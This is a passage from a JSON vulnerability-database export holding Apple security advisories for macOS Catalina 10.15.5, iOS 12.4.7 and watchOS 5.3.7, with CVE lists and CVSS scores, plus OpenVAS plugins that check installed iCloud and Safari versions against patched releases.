permission validation.\n\nCVE-2020-9817: Andy Grant of NCC Group\n\n**PackageKit**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to modify protected parts of the file system\n\nDescription: An access issue was addressed with improved access restrictions.\n\nCVE-2020-9851: an anonymous researcher, Linus Henze (pinauten.de)\n\nEntry updated July 15, 2020\n\n**Python**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2020-9793\n\n**rsync**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A remote attacker may be able to overwrite existing files\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2014-9512: gaojianfeng\n\nEntry added July 28, 2020\n\n**Sandbox**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to bypass Privacy preferences\n\nDescription: An access issue was addressed with additional sandbox restrictions.\n\nCVE-2020-9825: Sreejith Krishnan R (@skr0x1C0)\n\n**Sandbox**\n\nAvailable for: macOS Mojave 10.14.6\n\nImpact: A user may gain access to protected parts of the file system\n\nDescription: This issue was addressed with a new entitlement.\n\nCVE-2020-9771: Csaba Fitzl (@theevilbit) of Offensive Security\n\n**Security**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A file may be incorrectly rendered to execute JavaScript\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2020-9788: Wojciech Regu\u0142a of SecuRing (wojciechregula.blog)\n\nEntry updated July 15, 2020\n\n**Security**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2020-9854: Ilias Morad (A2nkF)\n\nEntry added July 28, 2020\n\n**SIP**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A non-privileged user may be able to modify restricted network settings\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9824: @jamestraynor, Csaba Fitzl (@theevilbit) of Offensive Security\n\nEntry updated June 10, 2020\n\n**Software Update**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A person with physical access to a Mac may be able to bypass Login Window\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9810: Francis @francisschmaltz\n\nEntry added July 15, 2020\n\n**SQLite**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A malicious application may cause a denial of service or potentially disclose memory contents\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9794\n\n**System Preferences**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with improved state handling.\n\nCVE-2020-9839: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**USB Audio**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A USB device may be able to cause a denial of service\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2020-9792: Andy Davis of NCC Group\n\n**Wi-Fi**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory\n\nDescription: A double free issue was addressed with improved memory management.\n\nCVE-2020-9844: Ian Beer of Google Project Zero\n\n**Wi-Fi**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9830: Tielei Wang of Pangu Lab\n\n**Wi-Fi**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2020-9834: Yu Wang of Didi Research America\n\n**Wi-Fi**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: A local user may be able to read kernel memory\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2020-9833: Yu Wang of Didi Research America\n\n**Wi-Fi**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to determine kernel memory layout\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-9832: Yu Wang of Didi Research America\n\n**WindowServer**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed with improved input validation.\n\nCVE-2020-9841: ABC Research s.r.o. working with Trend Micro Zero Day Initiative\n\n**zsh**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2019-20044: Sam Foxman\n\n## Additional recognition\n\n**CoreBluetooth**\n\nWe would like to acknowledge Maximilian von Tschirschnitz (@maxinfosec1) of Technical University Munich and Ludwig Peuckert of Technical University Munich for their assistance.\n\n**CoreText**\n\nWe would like to acknowledge Jiska Classen (@naehrdine) and Dennis Heinze (@ttdennis) of Secure Mobile Networking Lab for their assistance.\n\n**Endpoint Security**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n\n**ImageIO**\n\nWe would like to acknowledge Lei Sun for their assistance.\n\n**IOHIDFamily**\n\nWe would like to acknowledge Andy Davis of NCC Group for their assistance.\n\n**IPSec**\n\nWe would like to acknowledge Thijs Alkemade of Computest for their assistance.\n\n**Login Window**\n\nWe would like to acknowledge Jon Morby and an anonymous researcher for their assistance.\n\n**Sandbox**\n\nWe would like to acknowledge Jason L Lang of Optum for their assistance.\n\n**Spotlight**\n\nWe would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive Security for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 06, 2023\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-05-26T00:00:00", "type": "apple", "title": "About the security content of macOS Catalina 10.15.5, Security Update 2020-003 Mojave, Security Update 2020-003 High Sierra", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9512", "CVE-2019-14868", "CVE-2019-20044", "CVE-2020-3878", "CVE-2020-3882", "CVE-2020-9771", "CVE-2020-9772", "CVE-2020-9779", "CVE-2020-9788", "CVE-2020-9789", "CVE-2020-9790", "CVE-2020-9791", "CVE-2020-9792", "CVE-2020-9793", "CVE-2020-9794", "CVE-2020-9795", "CVE-2020-9796", "CVE-2020-9797", "CVE-2020-9804", "CVE-2020-9808", "CVE-2020-9809", "CVE-2020-9810", "CVE-2020-9811", "CVE-2020-9812", "CVE-2020-9813", "CVE-2020-9814", "CVE-2020-9815", "CVE-2020-9816", "CVE-2020-9817", "CVE-2020-9821", "CVE-2020-9822", "CVE-2020-9824", "CVE-2020-9825", "CVE-2020-9826", "CVE-2020-9827", "CVE-2020-9828", "CVE-2020-9830", "CVE-2020-9831", "CVE-2020-9832", "CVE-2020-9833", "CVE-2020-9834", "CVE-2020-9837", "CVE-2020-9839", "CVE-2020-9841", "CVE-2020-9842", "CVE-2020-9844", "CVE-2020-9847", "CVE-2020-9851", "CVE-2020-9852", "CVE-2020-9854", "CVE-2020-9855", "CVE-2020-9856", "CVE-2020-9857", "CVE-2020-9994"], "modified": "2020-05-26T00:00:00", "id": "APPLE:5F5EC06D7439A214533E313BF66E84F0", "href": "https://support.apple.com/kb/HT211170", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T22:12:15", "description": "# About the security content of iOS 12.4.7\n\nThis document describes the security content of iOS 12.4.7.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## iOS 12.4.7\n\nReleased May 26, 2020\n\n**Mail**\n\nAvailable for: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted mail message may lead to unexpected memory modification or application termination\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9818: ZecOps.com\n\n**Mail**\n\nAvailable for: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted mail message may lead to heap corruption\n\nDescription: A memory consumption issue was addressed with improved memory handling.\n\nCVE-2020-9819: ZecOps.com\n\n**Wi-Fi**\n\nAvailable for: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch 6th generation\n\nImpact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2020-3843: Ian Beer of Google Project Zero\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 06, 2023\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-05-20T00:00:00", "type": "apple", "title": "About the security content of iOS 12.4.7", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3843", "CVE-2020-9818", "CVE-2020-9819"], "modified": "2020-05-20T00:00:00", "id": "APPLE:5D039C4531D6A51FF20C1C65087E31DF", "href": "https://support.apple.com/kb/HT211169", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:41:32", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## iOS 12.4.7\n\nReleased May 26, 2020\n\n**Mail**\n\nAvailable for: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted mail message may lead to unexpected memory modification or application termination\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9818: ZecOps.com\n\n**Mail**\n\nAvailable for: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted mail message may lead to heap corruption\n\nDescription: A memory consumption issue was addressed with improved memory handling.\n\nCVE-2020-9819: ZecOps.com\n\n**Wi-Fi**\n\nAvailable for: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch 6th generation\n\nImpact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2020-3843: Ian Beer of Google Project Zero\n", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-26T11:46:49", "title": "About the security content of iOS 12.4.7 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9819", "CVE-2020-3843", "CVE-2020-9818"], "modified": "2020-05-26T11:46:49", "id": "APPLE:HT211169", "href": "https://support.apple.com/kb/HT211169", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T22:12:13", "description": "# About the security content of watchOS 5.3.7\n\nThis document describes the security content of watchOS 5.3.7.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## watchOS 5.3.7\n\nReleased May 20, 2020\n\n**Mail**\n\nAvailable for: Apple Watch Series 1, Apple Watch Series 2, Apple Watch Series 3, and Apple Watch Series 4 when paired to an iPhone with iOS 12 installed\n\nImpact: Processing a maliciously crafted mail message may lead to heap corruption\n\nDescription: A memory consumption issue was addressed with improved memory handling.\n\nCVE-2020-9819: ZecOps.com\n\n**Wi-Fi**\n\nAvailable for: Apple Watch Series 1, Apple Watch Series 2, Apple Watch Series 3, and Apple Watch Series 4 when paired to an iPhone with iOS 12 installed\n\nImpact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2020-3843: Ian Beer of Google Project Zero\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 06, 2023\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-05-18T00:00:00", "type": "apple", "title": "About the security content of watchOS 5.3.7", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3843", "CVE-2020-9819"], "modified": "2020-05-18T00:00:00", "id": "APPLE:AF34F6EF09549EDA58BB0A4D84F25C02", "href": "https://support.apple.com/kb/HT211176", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:44:38", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## watchOS 5.3.7\n\nReleased May 20, 2020\n\n**Mail**\n\nAvailable for: Apple Watch Series 1, Apple Watch Series 2, Apple Watch Series 3, and Apple Watch Series 4 when paired to an iPhone with iOS 12 installed\n\nImpact: Processing a maliciously crafted mail message may lead to heap corruption\n\nDescription: A memory consumption issue was addressed with improved memory handling.\n\nCVE-2020-9819: ZecOps.com\n\n**Wi-Fi**\n\nAvailable for: Apple Watch Series 1, Apple Watch Series 2, Apple Watch Series 3, and Apple Watch Series 4 when paired to an iPhone with iOS 12 installed\n\nImpact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2020-3843: Ian Beer of Google Project Zero\n", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-26T11:05:43", "title": "About the security content of watchOS 5.3.7 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9819", "CVE-2020-3843"], "modified": "2020-05-26T11:05:43", "id": "APPLE:HT211176", "href": "https://support.apple.com/kb/HT211176", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-17T15:23:52", "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2020-05-27T00:00:00", "type": "openvas", "title": "Apple iCloud Security Updates(HT211179)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-3878", "CVE-2020-9802", "CVE-2020-9800", "CVE-2020-9790", "CVE-2020-9850", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9789", "CVE-2020-9794"], "modified": "2020-06-16T00:00:00", "id": "OPENVAS:1361412562310817029", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817029", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817029\");\n script_version(\"2020-06-16T07:17:49+0000\");\n script_cve_id(\"CVE-2020-9789\", \"CVE-2020-9790\", \"CVE-2020-3878\", \"CVE-2020-9794\",\n \"CVE-2020-9802\", \"CVE-2020-9805\", \"CVE-2020-9800\", \"CVE-2020-9806\",\n \"CVE-2020-9807\", \"CVE-2020-9850\", \"CVE-2020-9843\", \"CVE-2020-9803\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-16 07:17:49 +0000 (Tue, 16 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-27 12:24:11 +0530 (Wed, 27 May 2020)\");\n script_name(\"Apple iCloud Security Updates(HT211179)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An out-of-bounds write/read issues with bounds checking,\n\n - A memory corruption issues with input validation\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code, gain access to sensitive data, bypass security\n restrictions, and launch denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 11.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 11.2 or later.\n Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT211179\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nicVer = infos['version'];\nicPath = infos['location'];\n\nif(version_is_less(version:icVer, test_version:\"11.2\"))\n{\n report = report_fixed_ver(installed_version:icVer, fixed_version:\"11.2\", install_path:icPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-17T15:23:52", "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2020-05-27T00:00:00", "type": "openvas", "title": "Apple iCloud Security Updates(HT211181)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-3878", "CVE-2020-9802", "CVE-2020-9800", "CVE-2020-9790", "CVE-2020-9850", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9789", "CVE-2020-9794"], "modified": "2020-06-16T00:00:00", "id": "OPENVAS:1361412562310817028", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817028", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817028\");\n script_version(\"2020-06-16T07:17:49+0000\");\n script_cve_id(\"CVE-2020-9789\", \"CVE-2020-9790\", \"CVE-2020-3878\", \"CVE-2020-9794\",\n \"CVE-2020-9802\", \"CVE-2020-9805\", \"CVE-2020-9800\", \"CVE-2020-9806\",\n \"CVE-2020-9807\", \"CVE-2020-9850\", \"CVE-2020-9843\", \"CVE-2020-9803\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-16 07:17:49 +0000 (Tue, 16 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-27 12:16:06 +0530 (Wed, 27 May 2020)\");\n script_name(\"Apple iCloud Security Updates(HT211181)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An out-of-bounds write/read issue with bounds checking,\n\n - A memory corruption issues input validation\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code, gain access to sensitive data, bypass security\n restrictions, and launch denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 7.19\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 7.19 or later.\n Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT211181\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nicVer = infos['version'];\nicPath = infos['location'];\n\nif(version_is_less(version:icVer, test_version:\"7.19\"))\n{\n report = report_fixed_ver(installed_version:icVer, fixed_version:\"7.19\", install_path:icPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-17T15:23:51", "description": "This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2020-05-28T00:00:00", "type": "openvas", "title": "Apple Safari Security Updates(HT211177)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9801", "CVE-2020-9802", "CVE-2020-9800", "CVE-2020-9850", "CVE-2020-9807", "CVE-2020-9843", "CVE-2019-20503"], "modified": "2020-06-16T00:00:00", "id": "OPENVAS:1361412562310817030", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817030", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you 